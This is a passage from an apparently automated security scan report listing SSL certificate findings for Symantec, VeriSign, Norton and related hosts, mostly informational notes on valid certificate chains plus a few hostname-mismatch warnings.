The following problem was identified with the server's SSL certificate: The server's certificate is not valid for the server's hostname. The server presented the following certificates: Server certificate Issued to: ssl-certificate-center-ncsa.verisign.net Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Jul 05 18:00:00 GMT-06:00 2010 Valid to: Thu Jul 05 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.9. https://trust-center.verisign.ch/
Summary
Severity: Medium
Confidence: Certain
Host: https://trust-center.verisign.ch
Path: /
Issue detail
The following problem was identified with the server's SSL certificate: The server's certificate is not valid for the server's hostname. The server presented the following certificates: Server certificate Issued to: ssl-certificate-center-emea.verisign.net Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Jul 05 18:00:00 GMT-06:00 2010 Valid to: Thu Jul 05 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.10. https://trust-center.verisign.com/
Summary
Severity: Medium
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /
Issue detail
The following problem was identified with the server's SSL certificate: The server's certificate is not valid for the server's hostname. The server presented the following certificates: Server certificate Issued to: ssl-certificate-center-ncsa.verisign.net Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Jul 05 18:00:00 GMT-06:00 2010 Valid to: Thu Jul 05 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.11. https://us.norton.com/
Summary
Severity: Medium
Confidence: Certain
Host: https://us.norton.com
Path: /
Issue detail
The following problem was identified with the server's SSL certificate: The server's certificate is not valid for the server's hostname. The server presented the following certificates: Server certificate Issued to: www.norton.com Issued by: USERTrust Legacy Secure Server CA Valid from: Thu Jul 07 18:00:00 GMT-06:00 2011 Valid to: Sat May 19 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: USERTrust Legacy Secure Server CA Issued by: Entrust.net Secure Server Certification Authority Valid from: Thu Nov 26 14:33:13 GMT-06:00 2009 Valid to: Sat Oct 31 22:00:00 GMT-06:00 2015
Certificate chain #2 Issued to: Entrust.net Secure Server Certification Authority Issued by: Entrust.net Secure Server Certification Authority Valid from: Tue May 25 10:09:40 GMT-06:00 1999 Valid to: Sat May 25 10:39:40 GMT-06:00 2019
8.12. https://admin.instantservice.com/
Summary
Severity: Information
Confidence: Certain
Host: https://admin.instantservice.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates: Server certificate Issued to: *.instantservice.com Issued by: VeriSign Class 3 Secure Server CA - G3 Valid from: Wed Jul 06 18:00:00 GMT-06:00 2011 Valid to: Fri Jul 06 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Secure Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.13. https://buy-static.norton.com/
Summary
Severity: Information
Confidence: Certain
Host: https://buy-static.norton.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: buy-static.norton.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Jul 11 18:00:00 GMT-06:00 2011 Valid to: Sat Jul 28 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.14. https://cdn.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://cdn.verisign.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: cdn.verisign.com Issued by: www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign Valid from: Sun Apr 18 18:00:00 GMT-06:00 2010 Valid to: Fri Apr 18 17:59:59 GMT-06:00 2014
Certificate chain #1 Issued to: www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign Issued by: Class 3 Public Primary Certification Authority Valid from: Wed Apr 16 18:00:00 GMT-06:00 1997 Valid to: Mon Oct 24 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.15. https://cert.webtrust.org/
Summary
Severity: Information
Confidence: Certain
Host: https://cert.webtrust.org
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: cert.webtrust.org Issued by: www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign Valid from: Wed Oct 21 18:00:00 GMT-06:00 2009 Valid to: Sun Oct 21 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign Issued by: Class 3 Public Primary Certification Authority Valid from: Wed Apr 16 18:00:00 GMT-06:00 1997 Valid to: Mon Oct 24 17:59:59 GMT-06:00 2011
Certificate chain #2 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.16. https://donate.mozilla.org/
Summary
Severity: Information
Confidence: Certain
Host: https://donate.mozilla.org
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: donate.mozilla.org Issued by: UTN-USERFirst-Hardware Valid from: Mon Sep 20 18:00:00 GMT-06:00 2010 Valid to: Wed Sep 21 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: UTN-USERFirst-Hardware Issued by: UTN-USERFirst-Hardware Valid from: Fri Jul 09 12:10:42 GMT-06:00 1999 Valid to: Tue Jul 09 12:19:22 GMT-06:00 2019
8.17. https://drh.img.digitalriver.com/
Summary
Severity: Information
Confidence: Certain
Host: https://drh.img.digitalriver.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: *.img.digitalriver.com,ST=Minnesota Issued by: Akamai Subordinate CA 3 Valid from: Thu Feb 03 08:22:35 GMT-06:00 2011 Valid to: Fri Feb 03 08:22:35 GMT-06:00 2012
Certificate chain #1 Issued to: Akamai Subordinate CA 3 Issued by: GTE CyberTrust Global Root Valid from: Thu May 11 09:32:00 GMT-06:00 2006 Valid to: Sat May 11 17:59:00 GMT-06:00 2013
Certificate chain #2 Issued to: GTE CyberTrust Global Root Issued by: GTE CyberTrust Global Root Valid from: Wed Aug 12 18:29:00 GMT-06:00 1998 Valid to: Mon Aug 13 17:59:00 GMT-06:00 2018
8.18. https://enterprise-ssl-admin.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://enterprise-ssl-admin.verisign.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: enterprise-ssl-admin.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Thu Oct 22 18:00:00 GMT-06:00 2009 Valid to: Thu Oct 13 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Tue Aug 01 17:59:59 GMT-06:00 2028
Certificate chain #4 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.19. https://idprotect.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://idprotect.verisign.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: idprotect.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Wed Mar 24 18:00:00 GMT-06:00 2010 Valid to: Sat Mar 24 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.20. https://partnernet.symantec.com/
Summary
Severity: Information
Confidence: Certain
Host: https://partnernet.symantec.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: partnernet.symantec.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Thu Dec 16 18:00:00 GMT-06:00 2010 Valid to: Sun Jan 08 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.21. https://policy3.responsys.net/
Summary
Severity: Information
Confidence: Certain
Host: https://policy3.responsys.net
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: *.responsys.net Issued by: Equifax Secure Certificate Authority Valid from: Sun May 16 05:02:14 GMT-06:00 2010 Valid to: Sun Jun 17 14:48:31 GMT-06:00 2012
Certificate chain #1 Issued to: Equifax Secure Certificate Authority Issued by: Equifax Secure Certificate Authority Valid from: Sat Aug 22 10:41:51 GMT-06:00 1998 Valid to: Wed Aug 22 10:41:51 GMT-06:00 2018
8.22. https://press.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://press.verisign.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: press.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Tue Mar 02 18:00:00 GMT-06:00 2010 Valid to: Fri Mar 02 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.23. https://products.geotrust.com/
Summary
Severity: Information
Confidence: Certain
Host: https://products.geotrust.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: products.geotrust.com Issued by: GeoTrust Extended Validation SSL CA Valid from: Sat Apr 16 15:58:45 GMT-06:00 2011 Valid to: Sat May 18 12:50:47 GMT-06:00 2013
Certificate chain #1 Issued to: GeoTrust Extended Validation SSL CA Issued by: GeoTrust Primary Certification Authority Valid from: Tue Nov 28 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 28 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: GeoTrust Primary Certification Authority Issued by: Equifax Secure Certificate Authority Valid from: Tue Nov 28 10:08:31 GMT-06:00 2006 Valid to: Tue Aug 21 09:08:31 GMT-06:00 2018
Certificate chain #3 Issued to: Equifax Secure Certificate Authority Issued by: Equifax Secure Certificate Authority Valid from: Sat Aug 22 10:41:51 GMT-06:00 1998 Valid to: Wed Aug 22 10:41:51 GMT-06:00 2018
Certificate chain #4 Issued to: Equifax Secure Certificate Authority Issued by: Equifax Secure Certificate Authority Valid from: Sat Aug 22 10:41:51 GMT-06:00 1998 Valid to: Wed Aug 22 10:41:51 GMT-06:00 2018
8.24. https://products.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://products.verisign.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: products.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL CA Valid from: Wed Nov 18 18:00:00 GMT-06:00 2009 Valid to: Wed Nov 30 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Tue Aug 01 17:59:59 GMT-06:00 2028
Certificate chain #4 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.25. https://renewals.symantec.com/
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: renewals.symantec.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Apr 25 18:00:00 GMT-06:00 2011 Valid to: Wed Apr 25 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Tue Aug 01 17:59:59 GMT-06:00 2028
Certificate chain #4 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.26. https://seal.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://seal.verisign.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: seal.verisign.com Issued by: VeriSign Class 3 Secure Server CA - G2 Valid from: Tue Jul 06 18:00:00 GMT-06:00 2010 Valid to: Sun Jul 06 17:59:59 GMT-06:00 2014
Certificate chain #1 Issued to: VeriSign Class 3 Secure Server CA - G2 Issued by: VeriSign Trust Network Valid from: Tue Mar 24 18:00:00 GMT-06:00 2009 Valid to: Sun Mar 24 17:59:59 GMT-06:00 2019
Certificate chain #2 Issued to: VeriSign Trust Network Issued by: VeriSign Trust Network Valid from: Sun May 17 18:00:00 GMT-06:00 1998 Valid to: Tue Aug 01 17:59:59 GMT-06:00 2028
Certificate chain #3 Issued to: VeriSign Trust Network Issued by: VeriSign Trust Network Valid from: Sun May 17 18:00:00 GMT-06:00 1998 Valid to: Tue Aug 01 17:59:59 GMT-06:00 2028
8.27. https://securitycenter.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://securitycenter.verisign.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: SECURITYCENTER.VERISIGN.COM Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Dec 27 18:00:00 GMT-06:00 2010 Valid to: Thu Dec 27 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.28. https://symaccount.symantec.com/
Summary
Severity: Information
Confidence: Certain
Host: https://symaccount.symantec.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: symaccount.symantec.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Thu Feb 10 18:00:00 GMT-06:00 2011 Valid to: Thu Mar 01 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.29. https://symantec-corporation.com/
Summary
Severity: Information
Confidence: Certain
Host: https://symantec-corporation.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: symantec-corporation.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Mon May 16 18:00:00 GMT-06:00 2011 Valid to: Wed May 16 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.30. https://test-products.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://test-products.verisign.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: test-products.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL CA Valid from: Sun Nov 07 18:00:00 GMT-06:00 2010 Valid to: Wed Nov 07 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
Certificate chain #4 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.31. https://vipdeveloper.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://vipdeveloper.verisign.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: vipdeveloper.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL CA Valid from: Wed Mar 17 18:00:00 GMT-06:00 2010 Valid to: Sat Mar 17 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.32. https://vipmanager.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://vipmanager.verisign.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: vipmanager.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL CA Valid from: Sun Mar 07 18:00:00 GMT-06:00 2010 Valid to: Sat Mar 24 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.33. https://vipmobile.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://vipmobile.verisign.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: vipmobile.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Sun Dec 12 18:00:00 GMT-06:00 2010 Valid to: Wed Dec 12 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.34. https://vs.symantec.com/
Summary
Severity: Information
Confidence: Certain
Host: https://vs.symantec.com
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:
Server certificate Issued to: vs.symantec.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Jun 27 18:00:00 GMT-06:00 2011 Valid to: Thu Jun 27 17:59:59 GMT-06:00 2013
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.35. https://www-secure.symantec.com/
Summary
Severity: Information
